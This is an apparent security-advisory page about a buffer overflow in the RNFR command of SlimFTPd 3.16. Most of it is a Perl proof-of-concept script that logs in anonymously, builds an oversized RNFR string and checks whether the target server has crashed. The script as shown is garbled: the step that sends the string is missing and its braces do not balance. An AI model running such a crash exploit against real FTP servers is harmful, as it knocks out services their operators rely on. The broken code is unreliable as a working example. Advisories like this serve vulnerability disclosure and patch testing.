SlimFTPd RNFR Buffer Overflow (Exploit) Summary
"SlimFTPd is a fully standards-compliant FTP server implementation with an advanced virtual file system."
Due to lack of proper length checking routines in SlimFTPd, attackers are able to to execute arbitrary code by overflowing a buffer the program uses. The following exploit code can be used to test your system for the mentioned vulnerabilities.
The information has been provided by Dim K0r0l.
Vulnerable Systems:
* SlimFTPd version 3.16
Immune Systems:
* SlimFTPd version 3.17
# --------------------------------------------------- #
# - PoC exploit for SlimFTPd Server #
# version 3.16 #
# bug found by ml-bugtraq at #
# #
# coded by k0r0l from acolytez team #
# visit for details #
# --------------------------------------------------- #
use Net::FTP;
# geting data
$host = @ARGV[0];
$port = @ARGV[1];
$debug = @ARGV[2];
$user = @ARGV[3];
$pass = @ARGV[4];
# ===========
if (($host) && ($port)) {
# make exploit string
$exploit_string = "RNFR ";
$exploit_string .= "X"x512;
# ===================
print "Trying to connect to $host:$port\n";
$sock = Net::FTP->new("$host",Port => $port, TimeOut => 30, Debug => $debug) or die "[-] Connection failed\n";
print "[+] Connect OK!\n";
print "Logging...\n";
if (!$user) {
$user = "anonymous";
$pass = "";
$sock->login($user, $pass);
$answer = $sock->message;
print "Sending string...\n";
print "Server $host may be down. Checking...\n";
$sock = Net::FTP->new("$host",Port => $port, TimeOut => 30, Debug => $debug) or die "[-] Connection failed\n";
if ($sock) {print "[-] Exploit failed.\n";} else {print "[+] Server crashed!\n";}
} else {
print "SlimFTPd Server - PoC Exploit\n\n\nUsing: $0 host port username password [debug: 1 or 0]\n\n";